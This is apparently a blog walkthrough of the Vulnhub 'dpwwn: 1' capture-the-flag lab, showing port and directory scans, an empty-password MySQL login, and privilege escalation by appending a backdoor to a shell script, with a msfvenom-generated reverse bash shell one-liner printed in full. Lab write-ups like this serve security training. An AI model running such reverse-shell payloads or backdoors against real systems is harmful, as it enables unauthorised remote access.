zoukankan      html  css  js  c++  java
  • dpwwn: 1 Vulnhub Walkthrough

    主机层面扫描:

    ╰─ nmap -p1-65535 -sV -A 10.10.202.130

    22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)

    80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)

    3306/tcp open mysql MySQL 5.5.60-MariaDB

    web目录枚举

    ╰─ dirb http://10.10.202.130/

    ---- Scanning URL: http://10.10.202.130/ ----
    + http://10.10.202.130/cgi-bin/ (CODE:403|SIZE:210)
    + http://10.10.202.130/info.php (CODE:200|SIZE:47537)

    暂时么有可用信息

    尝试登录MySQL,空密码登录成功

    SSH 登录尝试提权

    追加后门脚本到此shell脚本中去,即可

    ╰─ msfvenom -p cmd/unix/reverse_bash lhost=10.10.202.145 lport=1234 R
    [-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
    [-] No arch selected, selecting arch: cmd from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 67 bytes
    0<&175-;exec 175<>/dev/tcp/10.10.202.145/1234;sh <&175 >&175 2>&175

    完!

  • 相关阅读:
    python 时间等待
    python threading多线程
    c 字符串的结束标志
    c 输出是自动显示输出类型
    c 的占位符
    c数据类型
    游戏引擎
    java 数据类型
    python 读写json数据
    python 多线程_thread
  • 原文地址:https://www.cnblogs.com/hack404/p/11377926.html
Copyright © 2011-2022 走看看